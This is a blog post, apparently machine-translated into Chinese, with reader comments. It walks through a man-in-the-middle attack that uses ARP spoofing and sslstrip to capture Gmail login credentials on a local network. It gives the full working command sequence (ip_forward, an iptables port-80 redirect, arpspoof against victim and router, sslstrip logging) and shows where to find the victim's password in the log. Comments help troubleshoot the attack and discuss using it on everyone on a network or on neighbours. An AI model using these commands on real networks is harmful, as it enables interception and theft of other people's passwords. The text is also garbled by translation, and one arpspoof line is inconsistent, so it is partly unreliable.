您好Blogger。
今天,我有一小部分樣本說明了在沒有我們許多人喜歡的網絡安全的情況下,在任何網絡中連接網絡有多危險。
今天,我將通過Sslstrip使用ArpSpoofing來獲取Gmail密碼。 為了更好地控制環境,我創建了一個名為“testarp@gmail.com“。
而且由於我不太喜歡序言,所以讓我們開始做生意。
環境
對於此測試,我們具有以下內容:
1.攻擊者: 具有Debian Wheezy的是我的台式機或台式計算機。 您可以從存儲庫中安裝 單條 y 嗅探 擁有 偽造
2.受害人: 受害者是一個Android平板電腦,它只想通過瀏覽器查看他的郵件。
3.媒介: 中間是我的 思科DPC2425路由器
地址。
攻擊者地址: 172.26.0.2
路由器地址:172.26.0.1
受害者的地址: 172.26.0.8
攻擊:
對於此攻擊,我們要做的第一件事是激活轉發,以便我們的計算機可以在不通知受害者的情況下將信息轉發給受害者。 (否則將是拒絕服務攻擊)
為此,我們將使用:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
現在如果我們執行 tail -f desdelinux 我們直接看到即時資訊
那麼,我們如何得到想要的呢?
首先讓我們在平板電腦上輸入我們的郵件。 登錄時,我們看到控制台上出現了成千上萬的東西。
現在已經完成了,讓我們打開我們的文件“desdelinux” 與奈米
nano desdelinux
使用Control + W,我們搜索稱為SECURE POST的內容。
我們將看到類似的內容。
受害者的電子郵件和密碼是那條看不見的大字句。
因此,我們向右行駛,直到最終看到隧道盡頭的燈。
在另一個場合,我們將看到我們如何才能稍微保護自己免受這些攻擊。
問候
我藉此機會說,發布該帖子時,命令不正確。
末尾的iptables命令缺少另一行上的8080。 然後arpspoof命令都在同一行上。 每個命令在不同的行上。
希望編輯者可以看到並修復它。
問候。
我已經做了您提到的更正,可以嗎?
如果要在首選條目中插入代碼,請使用HTML視圖,並在將文章發送到待處理之前驗證文章是否正確。 謝謝。
知道我們這些沒有知識的人是如此脆弱,真是令人不寒而栗。 很好的信息,即使我對這個主題了解得很少,我也知道它的重要性。 謝謝!
問候
但這僅在攻擊者和受害者位於同一網絡上時才有效。 無論如何,在我看來,如果(在同一網絡上)使用HTTPS進行連接不會發生,因為數據在離開您的計算機之前已被加密。 如果您通過HTTP(不帶S)進行連接,我認為即使查看網絡電纜也可以看到密鑰。
這不是真的。 我正在破解gmail密鑰,如果您發現gmail使用https。 所以? 關鍵是,儘管https是安全的,但它取決於http。 所以它不是那麼安全。
不要對HTTP承認太多,以至於S不適合超人使用,而是指“安全”使用
它可以在有或沒有https的情況下使用,我已經在更專業的linux發行版中進行了嘗試,並且沒有問題
您可以精確地使用它為那些竊取您的Wi-Fi的人教課。 😀
這或多或少就像他們很久以前在Chema Alonso的博客上所說的那樣:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia,它的功能非常棒!/然後,當我去檢查銀行帳戶時,每次我使用VPN時,他們都會告訴我偏執狂……)。 順便說一句,你必須看到人們在評論中有多憤世嫉俗...
現在,我們需要學習有關如何創建和提供自己的VPN服務的教程。
您鏈接的故事非常有趣,甚至值得一本新書,這使我想起了我使用鄰居的互聯網時的經歷,儘管我說我知道這個話題,但我認為我永遠也看不到幸運的是,對我而言,他們只將密碼更改為WPA2,這就是我與ISP的故事開始的地方
這就是標題中提到Sslstrip的原因。
只要攻擊者在中間,它就可以工作
你在棱鏡工作什麼波浪? -.-
沒有。
您還在等什麼發送XD請求
問候
好帖子
有趣的是,我稍後再做一個教育測試。也許我什至可以刪除WiFi的密碼,然後玩一會兒😛
您是否有機會通過類似的操作將不同的頁面發送到目標請求的頁面? 例如,他們想打開Facebook,而我將他們重定向到Google? 😛
是。 但這是完全不同的一卷。
也許我以後再發布。
很好的帖子,這些主題很有教育意義,現在我們需要能夠抵抗這種攻擊,因為有些人(例如我)連接到公共網絡(例如大學),避免這種攻擊將很有幫助。
的問候!
這對我沒用🙁
除了通過服務器證書(一旦您的計算機上有證書,瀏覽器負責加密)通過服務器證書對https連接進行加密(使用iptables)重定向了端口80(http)而不是443以外,我在這裡有些失敗,即https
我也這麼認為。 關鍵是,儘管https是“安全的”,但不幸的是它依賴於http。 因此sslstrip利用了這一點,它使瀏覽器認為它使用的是https憑據,但沒有使用。
天哪! 但瀏覽器應該會看到類似“此證書來自可疑網站或類似內容的警告”之類的警告……我絕對必須對XD進行測試
不,絕對沒有任何結果。
終於對我有用
我已使用密碼連接到WEP網絡,並且無論如何它都會直接向我顯示密碼。
一個問題。 您是否可以對網絡中連接的所有計算機執行相同的步驟,而不要讓一個受害者受害?
是的你可以。 但是我還沒有做實驗。 自己嘗試,並告訴我們您的狀況。
我唯一得到的是受害者的機器脫機,但是sslstrip沒有顯示任何信息:/
您需要暫時禁用防火牆。 或至少啟用傳入連接。
探針,我只能看到Facebook頁面的用戶名和密碼,在gmail中,我在日誌中沒有找到任何結果,我也只需要一行arpspoof«arpspoof -i -t«。 另一方面,受害機器無法打開某些頁面。 我將繼續調查,這很有趣。 對於使用Manjaro的用戶而言,要安裝的軟件包對dsniff(這裡是arpspoff),twisted和python2-pyopenssl有所幫助。 可以從這裡下載Sslstrip: http://www.thoughtcrime.org/software/sslstrip/
運行它$ python2 sslstrip.py
問候。
它沒有出來,但是arpspoof行是:#arpspoof -i int -t ip-victim ip-router
看我完全按照你的意思說:
echo“ 1”> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
問題是受害者是我在房間裡的另一台電腦,我無法連接到必須重啟路由器的位置,我該怎麼辦?
另一件事,我正在使用虛擬機,並且當我執行iwconfig命令時,不會出現wlan0,也不會在我執行ifconfig時出現,但是,如果我的虛擬機上有Internet,則帶有eth0接口。